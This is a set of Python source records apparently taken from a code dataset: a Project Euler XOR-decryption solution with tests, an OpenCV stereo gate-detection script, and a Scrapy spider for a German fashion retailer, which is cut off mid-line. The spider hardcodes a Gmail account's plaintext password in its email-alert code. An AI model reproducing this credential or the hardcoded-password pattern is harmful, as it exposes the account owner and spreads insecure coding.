+{"seq_id":"303449504","text":"import string\nimport unittest\n\nfrom library.common import Common\nfrom library.permutations import Permutations\n\n\"\"\"\nXOR decryption\n\nEach character on a computer is assigned a unique code and the preferred standard is ASCII \n(American Standard Code for Information Interchange). \nFor example, uppercase A = 65, asterisk (*) = 42, and lowercase k = 107.\nA modern encryption method is to take a text file, convert the bytes to ASCII, then XOR each byte with a given value, \ntaken from a secret key. The advantage with the XOR function is that using the same encryption key on the cipher text, \nrestores the plain text; for example, 65 XOR 42 = 107, then 107 XOR 42 = 65.\nFor unbreakable encryption, the key is the same length as the plain text message, \nand the key is made up of random bytes. \nThe user would keep the encrypted message and the encryption key in different locations, and without both \"halves\", \nit is impossible to decrypt the message.\nUnfortunately, this method is impractical for most users, so the modified method is to use a password as a key. \nIf the password is shorter than the message, which is likely, the key is repeated cyclically throughout the message. \nThe balance for this method is using a sufficiently long password key for security, but short enough to be memorable.\nYour task has been made easy, as the encryption key consists of three lower case characters. \nUsing p059_cipher.txt (right click and 'Save Link/Target As...'), a file containing the encrypted ASCII codes, \nand the knowledge that the plain text must contain common English words, \ndecrypt the message and find the sum of the ASCII values in the original text.\n\"\"\"\n\ncharacters = string.ascii_lowercase\npossible_keys = Permutations.combinations_of_length_3(characters)\nencrypted_text = [int(i) for i in Common.read_from_resources(\"59\").read().split(\",\")]\nbanned_letters = [\"~\", \"{\", \"$\", \"@\", \"%\", \"!\"]\n\n\ndef find_encrypted_text():\n for possible_key in possible_keys:\n cipher_ascii = \"\"\n text = encrypted_text\n for i in range(0, len(text)):\n j = i % len(possible_key)\n xor = text[i] ^ ord(possible_key[j])\n cipher_ascii = cipher_ascii + chr(xor)\n if len([bad_letter for bad_letter in banned_letters if bad_letter in chr(xor)]) > 0:\n break\n if len(cipher_ascii) == len(encrypted_text):\n return cipher_ascii\n\n\nclass Test(unittest.TestCase):\n def test_decrypt(self):\n encrypt = 65 ^ 42\n assert encrypt == 107\n assert encrypt ^ 42 == 65\n\n def test_result(self):\n print(sum([ord(letter) for letter in find_encrypted_text()]))\n","sub_path":"problems/solved_problems/test_059_xor_decryption.py","file_name":"test_059_xor_decryption.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"42443349","text":"#!/usr/bin/python\nimport cv2\n#import tf.transformations as tfs\nimport numpy as np\nimport math\nfrom time import strftime, localtime, time\nimport matplotlib.pyplot as plt\n\n'''\nVideoCapture settings:\n0. CV_CAP_PROP_POS_MSEC Current position of the video file in milliseconds.\n1. CV_CAP_PROP_POS_FRAMES 0-based index of the frame to be decoded/captured next.\n2. CV_CAP_PROP_POS_AVI_RATIO Relative position of the video file\n3. CV_CAP_PROP_FRAME_WIDTH Width of the frames in the video stream.\n4. CV_CAP_PROP_FRAME_HEIGHT Height of the frames in the video stream.\n5. CV_CAP_PROP_FPS Frame rate.\n6. CV_CAP_PROP_FOURCC 4-character code of codec.\n7. CV_CAP_PROP_FRAME_COUNT Number of frames in the video file.\n8. CV_CAP_PROP_FORMAT Format of the Mat objects returned by retrieve() .\n9. CV_CAP_PROP_MODE Backend-specific value indicating the current capture mode.\n10. CV_CAP_PROP_BRIGHTNESS Brightness of the image (only for cameras).\n11. CV_CAP_PROP_CONTRAST Contrast of the image (only for cameras).\n12. CV_CAP_PROP_SATURATION Saturation of the image (only for cameras).\n13. CV_CAP_PROP_HUE Hue of the image (only for cameras).\n14. CV_CAP_PROP_GAIN Gain of the image (only for cameras).\n15. CV_CAP_PROP_EXPOSURE Exposure (only for cameras).\n16. CV_CAP_PROP_CONVERT_RGB Boolean flags indicating whether images should be converted to RGB.\n17. CV_CAP_PROP_WHITE_BALANCE Currently unsupported\n18. CV_CAP_PROP_RECTIFICATION Rectification flag for stereo cameras (note: only supported by DC1394 v 2.x backend currently)\n\n'''\n\n# Camera Matrix\ncameraMatrix = np.array([[700.0499877929688, 0.0, 637.5999755859375],\n\t\t\t\t\t\t\t[0.0, 700.0499877929688, 382.5060119628906],\n\t\t\t\t\t\t\t[0.0, 0.0, 1.0]])\n\t\n# Distortion Coefficients\ndistCoeffs = np.array([-0.1740500032901764, 0.028304599225521088, 0.0, 0.0, 0.0])\n\t\n\t\n\ndef rvec2quat(vector):\n\tl = np.linalg.norm(vector)\n\tsin_th = math.sin(l/2)\n\tx = vector[0] /l * sin_th\n\ty = vector[1] /l * sin_th\n\tz = vector[2] /l * sin_th\n\tw = math.cos(l/2)\n\treturn np.array([x, y, z, w])\n\n\ndef quat2euler(q):\n\t #q = [x,y,z,w]\n\troll = np.arctan2( 2*(q[3]*q[0] + q[1]*q[2]), 1 - 2*(q[0]**2 + q[1]**2) )\n\tpitch = np.arcsin( 2*(q[3]*q[1] - q[0]*q[2]) )\n\tyaw = np.arctan2( 2*(q[3]*q[2] + q[0]*q[1]), 1 - 2*(q[1]**2 + q[2]**2) )\n\treturn np.array([roll,pitch,yaw])\n\n\ndef solidity(contour):\n\thull_area = cv2.contourArea(cv2.convexHull(contour))\n\tif (hull_area != 0) :\n\t\treturn float(cv2.contourArea(contour))/hull_area\n\telse:\n\t\treturn 0\n\n\ndef aspectRatio(contour):\n\tx,y,w,h = cv2.boundingRect(contour)\n\treturn float(w)/h\n\t\n\t\ndef annotateCorners(contour, img):\n\tcontour = contour.reshape(4,2).tolist()\n\tcount = 1\n\tfor point in contour:\n\t\tcv2.circle(img, (point[0], point[1]), 10, (255,255,0), 0)\n\t\tcv2.putText(img, str(count), (point[0], point[1]), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255,255), 2, cv2.LINE_AA)\n\t\tcount = count + 1\n\t \n\t \ndef detect_gate_pose(img, hsv_thresh_low, hsv_thresh_high):\n\t'''\n\tDescription: The functiont takes in an image and hsv threshold values, detects \n\t\t\t\tthe largest 4-sided polygon and returns its corner coordinates.\n\t@params: \n\timg: CV2 RGB Image\n\thsv_threshold_low: Low threshold for color detection in HSV format, numpy array of length 3\n\thsv_threshold_high: High threshold for color detection in HSV format, numpy array of length 3\n\t\n\t@return:\n\tcontour: Numpy array of 4 coordinates of contour corners\n\t'''\n\theight, width, depth = img.shape\n\thalf_width = int(width/2)\n\t\n\t# Separate left and right images\n\tleft_img = img[:height, :int(width/2)]\n\tright_img = img[:height, int(width/2):width]\n\t\n\t## Undistort images\n\tleft_img = cv2.undistort(left_img, cameraMatrix, distCoeffs)\n\tright_img = cv2.undistort(right_img, cameraMatrix, distCoeffs)\n\timg = np.concatenate((left_img, right_img), axis=1)\n\t\n\t# Convert to HSV\n\t#hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\t#cv2.imshow('hsv', hsv)\n\t\n\t\n\t# Convert to gray\n\t#gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\t#cv2.imshow('hsv', hsv)\n\t\n\t## Mask\n\t#mask = cv2.inRange(hsv, hsv_thresh_low, hsv_thresh_high)\n\t##print(mask)\n\t#cv2.imshow('mask', mask)\n\t\n\t# Blur \n\t#blur = cv2.GaussianBlur(mask,(3,3), 3)\n\t#cv2.imshow('Blur', blur)\n\t\n\t#cv2.imshow('undistort', undistort_img)\n\t\n\t# HSV, Mask and blur left image\n\tleft_hsv = cv2.cvtColor(left_img, cv2.COLOR_BGR2HSV)\n\t#right_hsv = cv2.cvtColor(right_img, cv2.COLOR_BGR2HSV)\n\tleft_mask = cv2.inRange(left_hsv, hsv_thresh_low, hsv_thresh_high)\n\t#right_mask = cv2.inRange(right_hsv, hsv_thresh_low, hsv_thresh_high)\n\tleft_mask = cv2.GaussianBlur(left_mask,(3,3), 2)\n\t#right_mask = cv2.inRange(right_img, hsv_thresh_low, hsv_thresh_high)\n\n\t# gray image\n\t#left_gray = cv2.cvtColor(left_img, cv2.COLOR_BGR2GRAY)\n\t#right_gray = cv2.cvtColor(right_img, cv2.COLOR_BGR2GRAY)\n\t#gray_img = np.concatenate((left_gray, right_gray), axis=1)\n\t#cv2.imshow(\"Gray image\", gray_img)\n\t\n\t## Binary image\n\t#ret,left_thresh = cv2.threshold(left_gray,127,255,cv2.THRESH_BINARY)\n\t#cv2.imshow(\"Left_thresh\", left_thresh)\n\t\n\t#print(mask)feture \n\t\n\t# SIFT feature detection\n\t#sift = cv2.SIFT()\n\t#kp = sift.detect(gray_img,None)\n\t#sift_img=cv2.drawKeypoints(gray_img,kp)\n\t#cv2.imshow('sift_img', sift_img)\n\t\n\t# Find contours\n\tcontours, hierarchy = cv2.findContours(left_mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\t#print(\"Contour_list: {}\".format(contours))\n\t\n\t# Print solidity\n\t#print(\"Contour solidities:\")\n\t#for cnt in contours:\n\t\t#print(solidity(cnt))\n\t\n\t# Draw all contours\n\t#contour_img = left_img.copy()\n\t#cv2.drawContours(contour_img, contours, -1, (0, 255, 0), 1)\n\t#cv2.imshow('contour_img', contour_img)\n\n\t# Approximate quadrilaterals\n\tquadrl=[]\n\tfor cnt in contours:\n\t\tapprox = cv2.approxPolyDP(cnt,0.10*cv2.arcLength(cnt,True),True)\n\t\tif len(approx) == 4:\n\t\t\tquadrl.append(approx)\n\t\t\t\n\t#print(\"Contours before all filters: %d\" % len(quadrl))\n\t\t\t\n\t# Filter contour by area: area > 500\n\tquadrlFiltered = list(filter(lambda x: (cv2.contourArea(x) > 1000) , quadrl))\n\t#print(\"Contours after area filter: %d\" % len(quadrlFiltered))\n\n\t# Filter for contour solidity > 0.9\n\t#quadrlFiltered = list(filter(lambda x: (solidity(x) > 0.90) , quadrlFiltered))\n\t#print(\"Contours after solidity filter: %d\" % len(quadrlFiltered))\n\t\n\t# Filter by contour aspect ratio: 1.20 > AR > 0.8\n\tquadrlFiltered = list(filter(lambda x: (aspectRatio(x) > 0.8) & (aspectRatio(x) < 1.35) , quadrlFiltered))\n\t#print(\"Contours after aspect ratio filter: %d\" % len(quadrlFiltered))\n\n\t\n\t#floodfill_img = mask.copy()\n\t\n\t\n\t#print(\"Square contour areas:\")\n\t#for sq in quadrlFiltered:\n\t\t#print(cv2.contourArea(sq))\n\t\n\t# Sort quadrilaterals by area\n\tquadrlFiltered = sorted(quadrlFiltered, key=lambda x: cv2.contourArea(x))\n\t\n\t\n\tif len(quadrlFiltered) > 0:\n\t\tgate_contour = quadrlFiltered[-1].reshape(4,2) # Return the largest square contour by area (returns coordinates of corners)\n\t\t\n\t\t# Sort the points starting with top left and going anti-clockwise\n\t\tcenter = gate_contour.mean(axis=0)\n\t\tgate_cnt_sorted = [[0,0]]*4\n\t\tfor point in gate_contour:\n\t\t\tif point[0] < center[0] and point[1] < center[1]:\n\t\t\t\t\tgate_cnt_sorted[0] = point\n\t\t\telif point[0] <= center[0] and point[1] >= center[1]:\n\t\t\t\t\tgate_cnt_sorted[1] = point\n\t\t\telif point[0] > center[0] and point[1] < center[1]:\n\t\t\t\tgate_cnt_sorted[3] = point\n\t\t\telse:\n\t\t\t\tgate_cnt_sorted[2] = point\n\t\t\t\t\n\t\tgate_cnt_sorted = np.array(gate_cnt_sorted)\n\t\t\n\t\tconvolve_img = []\n\t\tfor left_point in gate_cnt_sorted:\n\t\t\t#left_point = gate_cnt_sorted[2]\n\t\t\tleft_point.reshape(1,2)\n\t\t\t\n\t\t\t#print(\"H:{}, W:{}\".format(height, width))\n\t\t\t\n\t\t\t# Extract Kernel from left gray image\n\t\t\tdelta = int(0.02*half_width)\n\t\t\tkernel_left = left_img[left_point[1]-delta:left_point[1]+delta , left_point[0]-delta:left_point[0]+delta]\n\t\t\t#print(\"Left Point: {}\".format(left_point))\n\t\t\t#print(\"delta: {}\".format(delta))\n\t\t\t#print(\"kernel size: {}\".format(kernel_left.shape))\n\t\t\t#cv2.imshow(\"kernel_left\", kernel_left)\n\n\t\t\t# Get minimum cost point for the right image\n\t\t\tmin_cost_x = delta\n\t\t\tmin_cost = 1000000\n\t\t\tcost_function = []\n\t\t\tfor x in range(delta+1, half_width-delta-1):\n\t\t\t\tkernel_right = right_img[left_point[1]-delta:left_point[1]+delta , x-delta:x+delta]\n\t\t\t\tif kernel_left.shape != kernel_right.shape:\n\t\t\t\t\tcontinue\n\t\t\t\tcost = np.square(np.subtract(kernel_left, kernel_right)).sum() + (left_point[0] - x)**2\n\t\t\t\tcost_function.append(cost)\t\n\t\t\t\tif cost <= min_cost:\n\t\t\t\t\tmin_cost_x = x\n\t\t\t\t\tmin_cost = cost\n\t\t\t\t\n\t\t\tcon_img = cv2.filter2D(right_img,-1,kernel_left)\n\t\t\t#convolve_img.append(con_img)\n\t\t\t\n\t\t\t\t\n\t\t\tprint(\"Left x: {}\".format(left_point[0]))\n\t\t\tprint(\"Min cost x: {}\".format(min_cost_x))\n\n\t\t\t#matched_right = right_img[left_point[1]-delta:left_point[1]+delta , min_cost_x-delta:min_cost_x+delta]\n\t\t\t#cv2.imshow(\"Matched\", matched_right)\n\t\t\t\n\t\t\t# Draw matched portions\n\t\t\tcv2.rectangle(img, (left_point[0]-delta, left_point[1]-delta), (left_point[0]+delta, left_point[1]+delta), (255,0,0), 2)\n\t\t\tcv2.rectangle(img, (min_cost_x-delta+half_width, left_point[1]-delta), (min_cost_x+delta+half_width, left_point[1]+delta), (255,0,0), 2)\n\t\t\t\n\t\t\n\t\tcv2.imshow(\"Feature Image\", img)\n\t\t\n\n\t\tcv2.imshow(\"Convolution image\", con_img)\n\t\t\n\t\t# Calculate disparity between the two points\n\t\tdisparity = left_point[0] - min_cost_x\n\t\tprint(\"Disparity: {}\".format(disparity))\n\t\treturn disparity\t\n\telse:\n\t\tprint(\"No gate detected!\")\n\t\treturn np.nan\n\n\ndef rectifyStereoImage(img):\n\theight, width = img.shape[:2]\n\t\n\tleft_img = img[:height, :int(width/2)]\n\tright_img = img[:height, int(width/2):width]\n\t\n\t\ndef getGatePosePnP(contour, objectPoints):\n\t## Camera Position wrt drone\n\t#dTc = [0, 0, 0]\n\t\n\t##Camera Rotation wrt drone\n\tdRc = np.array([[0,0,1],[-1,0,0],[0,-1,0]])\n\t#dQuatC = tfs.quaternion_from_matrix(dRc)\n\tdQuatC = [ 0.5, -0.5, 0.5, -0.5 ]\n\t\n\t# Camera Matrix\n\tcameraMatrix = np.array([[700.0499877929688, 0.0, 637.5999755859375],\n\t\t\t\t\t\t\t[0.0, 700.0499877929688, 382.5060119628906],\n\t\t\t\t\t\t\t[0.0, 0.0, 1.0]])\n\t\n\t# Distortion Coefficients\n\tdistCoeffs = np.array([-0.1740500032901764, 0.028304599225521088, 0.0, 0.0, 0.0])\n\t\n\t# Solve perspective n point algorithm\n\t(success, rvec, tvec) = cv2.solvePnP(objectPoints, contour.reshape(4,2).astype(float), cameraMatrix, distCoeffs)\n\t\n\trvec = np.squeeze(rvec)\n\ttvec = np.squeeze(tvec)\n\tquat = rvec2quat(rvec)\n\t\n\tquat = tfs.quaternion_multiply(quat, dQuatC)\n\ttvec = np.matmul(dRc, tvec.reshape(3,1))\n\t\n\t\n\t#print(\"Q : {}\\nT: {}\".format(quat, tvec))\n\t\n\treturn (quat, tvec)\n\n\ndef getDisparity(left_img, right_img, left_point):\n\tleft_point.reshape(1,2)\n\theight, width, depth = left_img.shape\n\tleft_img = cv2.cvtColor(left_img, cv2.COLOR_BGR2GRAY)\n\tright_img = cv2.cvtColor(right_img, cv2.COLOR_BGR2GRAY)\n\t#print(\"H:{}, W:{}\".format(height, width))\n\t\n\t# Extract Kernel from left image\n\tdelta = 20\n\tkernel_left = left_img[left_point[1]-delta:left_point[1]+delta , left_point[0]-delta:left_point[0]+delta]\n\n\t# Get minimum cost point for the right image\n\tmin_cost_x = delta\n\tmin_cost = 1000000\n\tfor x in range(delta+1, width-delta-1, 5):\n\t\tkernel_right = right_img[left_point[1]-delta:left_point[1]+delta , x-delta:x+delta]\n\t\tcost = np.absolute(kernel_left - kernel_right).sum() + abs(left_point[0] - x)\t\n\t\tif cost <= min_cost:\n\t\t\tmin_cost_x = x\n\t\t\tmin_cost = cost\n\t\n\t#print(\"Min cost x: {}\".format(min_cost_x))\n\t#matched_right = right_img[left_point[1]-delta:left_point[1]+delta , min_cost_x-delta:min_cost_x+delta]\n\t#cv2.imshow(\"Matched\", matched_right)\n\t\n\t# Calculate disparity between the two points\n\tdisparity = left_point[0] - min_cost_x\n\tprint(\"Disparity: {}\".format(disparity))\n\treturn disparity\n\t\n\t\ndef main():\n\t# Load image\n\t#img = cv2.imread('images/gates.png', 1)\t\n\t\n\t#cap = cv2.VideoCapture(0)\n\t#cap.set(5, 100)\n\t\n\t# Gate points:\n\t#[[[299 118]]\n\n\t #[[289 204]]\n\n\t #[[377 215]]\n\n\t #[[387 130]]]\n\n\tgate_side = 103\n\tobjectPoints = np.array([\n\t\t\t(-gate_side/2, -gate_side/2, 0.0),\n\t\t\t(-gate_side/2, gate_side/2, 0.0),\n\t\t\t(gate_side/2, gate_side/2, 0.0),\n\t\t\t(gate_side/2, -gate_side/2, 0.0)\n\t\t])\n\t\n\t\n\tcap = cv2.VideoCapture(\"videos/dual_image_video_blue.mp4\")\n\t#cap = cv2.VideoCapture(0)\n\t\n\t# 720p : 2560x720 : 60 FPS\n\t# WVGA : 1344x376 : 100 FPS\n\tcap.set(5, 100)\t# FPS\n\tcap.set(3, 2560)# Image Width\n\tcap.set(4, 720)\t# Image Height\n\tcap.set(10, 0.8) # Brightness\n\tcap.set(11, 0.5) # Contrast\n\tcap.set(12, 0.5) # Saturation\n\t#cap.set(13, 0.0) # Hue\n\t\n\tframe_width = int(cap.get(3) / 2)\n\tframe_height = int(cap.get(4))\n\tprint(frame_width, frame_height)\n\t\n\tVIDEO_RECORDING = False\n\t\t \n\tif VIDEO_RECORDING:\n\t\t# Define the codec and create VideoWriter object.The output is stored in 'outpy.avi' file.\n\t\tfilename = 'videos/gate_detection_'+ strftime(\"%d-%b-%Y_%H-%M-%S\", localtime()) + '.mp4'\n\t\tout = cv2.VideoWriter(filename,cv2.VideoWriter_fourcc('M','J','P','G'), 20, (frame_width,frame_height))\n\t\n\t## Color thresholds\n\t# Blue gate\t\n\thsv_thresh_low = (90, 50, 50)\n\thsv_thresh_high = (130, 255, 255)\n\t\n\t# Green gate\n\t#hsv_thresh_low = (40, 50, 50)\n\t#hsv_thresh_high = (110, 255, 255)\n\t\n\t# Green gate rgb\n\t#hsv_thresh_low = (100, 200, 100)\n\t#hsv_thresh_high = (255, 255, 255)\n\t\n\t# Red gate\n\t#hsv_thresh_low = (130, 40, 30)\n\t#hsv_thresh_high = (200, 255, 255)\n\t\n\t# Orange gate\n\t#hsv_thresh_low = (0, 100, 100)\n\t#hsv_thresh_high = (20, 255, 255)\n\n\n\twhile(cap.isOpened()):\n\t\tstart = time()\n\t\tret, img = cap.read()\t\n\t\t\t\n\t\tif ret:\n\t\t\t#left_img = img[0:frame_height, 0:frame_width]\n\t\t\t#right_img = img[0:frame_height, frame_width: 2*frame_width]\t\t\t\n\t\t\t\n\t\t\tpose = detect_gate_pose(img, hsv_thresh_low, hsv_thresh_high)\n\t\t\t\n\t\t\t#left_mask = cv2.inRange(cv2.cvtColor(left_img, cv2.COLOR_BGR2HSV), hsv_thresh_low, hsv_thresh_high)\n\t\t\t#right_mask = cv2.inRange(cv2.cvtColor(right_img, cv2.COLOR_BGR2HSV), hsv_thresh_low, hsv_thresh_high)\n\t\t\t#cv2.imshow('left_mask',left_mask)\n\t\t\t#cv2.imshow('right_mask',right_mask)\n\t\t\t\n\t\t\t# PnP algorithm\n\t\t\t#quat, tvec = getGatePose(left_cnt, objectPoints)\n\t\t\t#euler = quat2euler(quat)\t\n\t\t\t\n\t\t\t#cv2.drawContours(left_img, [left_cnt.reshape(4,2)], 0, (0,0,255), 2)\n\t\t\t#cv2.circle(img, (center[0], center[1]), 10, (255,255,0), 0)\n\t\t\t#cv2.putText(img, \"X: {}, Y: {}, Z: {}\".format(tvec[0], tvec[1], tvec[2]), (10, frame_height - 25), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,255), 1, cv2.LINE_AA)\n\t\t\t#cv2.putText(img, \"Roll: {}, Pitch: {}, Yaw: {}\".format(euler[0], euler[1], euler[2]), (10, frame_height - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,255), 1, cv2.LINE_AA)\n\t\t\t\n\t\t\t\t\t\t\t\t\t\t\n\t\t\t#cv2.drawContours(img, [left_cnt], 0, (0,0,255), 2)\n\t\t\t##cv2.circle(img, (center[0], center[1]), 10, (255,255,0), 0)\n\t\t\t##cv2.putText(img, \"X: {}, Y: {}, Z: {}\".format(tvec[0], tvec[1], tvec[2]), (10, frame_height - 25), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,255), 1, cv2.LINE_AA)\n\t\t\t##cv2.putText(img, \"Roll: {}, Pitch: {}, Yaw: {}\".format(euler[0], euler[1], euler[2]), (10, frame_height - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,255), 1, cv2.LINE_AA)\n\t\t\t#annotateCorners(left_cnt, img)\n\t\t\t\n\t\t\t\n\t\t\t# Print statements\n\t\t\tprint(\"Detection rate: {} Hz\".format(1/float(time() - start)))\t\t\t\t\n\t\t\t#print(\"Brightness: {} \".format(cap.get(10)))\t\t\t\t\n\t\t\t#print(\"Saturation: {} \".format(cap.get(11)))\t\t\t\t\n\t\t\t#print(\"Contrast: {} \".format(cap.get(12)))\t\t\t\t\n\t\t\t#print(\"Hue: {} \".format(cap.get(13)))\t\t\n\t\t\t\n\t\t\tif cv2.waitKey(50) & 0xFF == ord('q'):\n\t\t\t\tbreak\n\t\t\tif VIDEO_RECORDING:\n\t\t\t\tout.write(img) \n\t\t\n\t\telse:\n\t\t\tbreak\n\t\n\tcap.release()\n\tif VIDEO_RECORDING:\n\t\tout.release()\n\tcv2.destroyAllWindows()\n\n\n\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"vision_scripts/gate_extraction_video_stereo.py","file_name":"gate_extraction_video_stereo.py","file_ext":"py","file_size_in_byte":15277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"419945038","text":"# -*- coding: utf-8 -*-\r\nfrom scrapy.contrib.loader.processor import TakeFirst, MapCompose, Join\r\n#from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor\r\nfrom scrapy.contrib.linkextractors.lxmlhtml import LxmlLinkExtractor\r\nfrom scrapy.contrib.spiders import CrawlSpider, Rule\r\nfrom scrapy.selector import HtmlXPathSelector\r\nfrom scrapy.contrib.loader import ItemLoader\r\nfrom scrapy.http.cookies import CookieJar\r\nfrom scrapy.http import FormRequest, Request\r\nfrom scrapy import Spider\r\nfrom src.items import ProductItem\r\nimport time, re, json, os\r\nimport smtplib\r\nfrom scrapy import signals\r\nfrom scrapy.xlib.pydispatch import dispatcher\r\nfrom email.MIMEText import MIMEText\r\nimport collections\r\n\r\nclass MadeleineSpider(Spider):\r\n name = \"madeleinespider\"\r\n\r\n check_values = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\r\n\r\n def __init__(self):\r\n dispatcher.connect(self.spider_closed, signals.spider_closed)\r\n def spider_closed(self, spider):\r\n if not self.result_check:\r\n me = 'mmadeleinee2015@gmail.com'\r\n you = 'admin@catalogi.ru'\r\n text = u'MADELEINE_SPIDER\\nНе все данные собираются с сайта (есть пустые поля), см. log.txt на сервере'\r\n subj = 'MADELEINE_SPIDER'\r\n\r\n # SMTP-сервер\r\n server = \"smtp.gmail.com\"\r\n port = 25\r\n user_name = \"mmadeleinee2015@gmail.com\"\r\n user_passwd = \"madeleine78\"\r\n\r\n # формирование сообщения\r\n msg = MIMEText(text, \"\", \"utf-8\")\r\n msg['Subject'] = subj\r\n msg['From'] = me\r\n msg['To'] = you\r\n\r\n # отправка\r\n s = smtplib.SMTP(server, port)\r\n s.ehlo()\r\n s.starttls()\r\n s.ehlo()\r\n s.login(user_name, user_passwd)\r\n s.sendmail(me, you, msg.as_string())\r\n s.quit()\r\n\r\n def start_requests(self):\r\n l = [Request(url=\"http://www.madeleine.de/mode/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/abendmode/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/bademode/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/blazer/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/blusen/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/dessous/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/freizeit-homewear/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/hosen/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/hosenanzuege/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/jacken-maentel/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/kleider/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/kostueme/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/nachtwaesche/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/overalls/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/roecke/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/shirts-tops/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/strickmode/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/schuhe/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/accessoires/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/schuhe/ballerinas/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/schuhe/boots/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/schuhe/mokassins/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/schuhe/pumps/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/schuhe/sandaletten/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/schuhe/stiefel-stiefeletten/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/schuhe/pantoletten/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/accessoires/guertel/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/accessoires/handschuhe/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/accessoires/muetzen-huete/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/accessoires/schals-tuecher/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/accessoires/schmuck/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/accessoires/sonnenbrillen/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/accessoires/taschen/\",\r\n callback=self.parse_page)]\r\n return l\r\n\r\n #test\r\n #product_path = \"/sandalette-mit-ziernieten-0s1023393.html\"\r\n #product_path = \"/chantelle-slip-mit-spitze-0a1027019.html\"\r\n #item = ProductItem()\r\n #item[\"path\"] = product_path\r\n\r\n #request = Request(url=\"http://www.madeleine.de\" + product_path, callback=self.parse_product)\r\n #request.meta['item'] = item\r\n\r\n #yield request\r\n\r\n def parse_page(self, response):\r\n\r\n # ------products_paths------\r\n\r\n products_paths = response.xpath(\"//div[@id='articles']/div/a/@href\").extract()\r\n\r\n for product_path in products_paths:\r\n item = ProductItem()\r\n item[\"path\"] = product_path\r\n\r\n request = Request(url=\"http://www.madeleine.de\" + product_path, callback=self.parse_product)\r\n request.meta['item'] = item\r\n\r\n yield request\r\n\r\n\r\n extr = LxmlLinkExtractor(allow=\"seite-\\d+\")\r\n links = extr.extract_links(response)\r\n\r\n for link in links:\r\n yield Request(url=link.url, callback=self.parse_page)\r\n\r\n def parse_product(self, response):\r\n item = response.meta['item']\r\n\r\n if response.xpath(\"//div[@class='soldout']\"):\r\n return\r\n\r\n # ------name------\r\n\r\n item[\"masterID\"] = response.xpath(\"substring-before(substring-after(//script[contains(text(), 'var masterId=')], 'var masterId=\\\"'), '\\\";')\").extract()[0]\r\n item[\"name\"] = response.xpath(\"string(//h1)\").extract()[0]\r\n\r\n # ------care------\r\n\r\n item[\"care\"] = \"\"\r\n\r\n careLabel_x = response.xpath(\"//ul[@id='careLabels']/li\")\r\n if careLabel_x:\r\n careLabel = careLabel_x[0].xpath(\"text()\").extract()[0] + \":\"\r\n care_num = careLabel_x[0].xpath(\"substring-after(@class, '-')\").extract()[0]\r\n careLabel = careLabel + \"http://www.madeleine.de/img/site4/article/careicon-%s.png:\" % care_num\r\n careLabel = careLabel + response.xpath(\"string(//div[contains(@class, 'carelabels')]/p[@class='info'])\").extract()[0]\r\n item[\"care\"] = careLabel\r\n\r\n # ------consist------\r\n\r\n consist_text = response.xpath(\"string(//p[@id='hardFacts'])\").extract()[0]\r\n materials = re.findall(\"\\d+%\\s+(.+?)[,.]\", consist_text)\r\n\r\n consist = \",\".join(materials)\r\n consist = 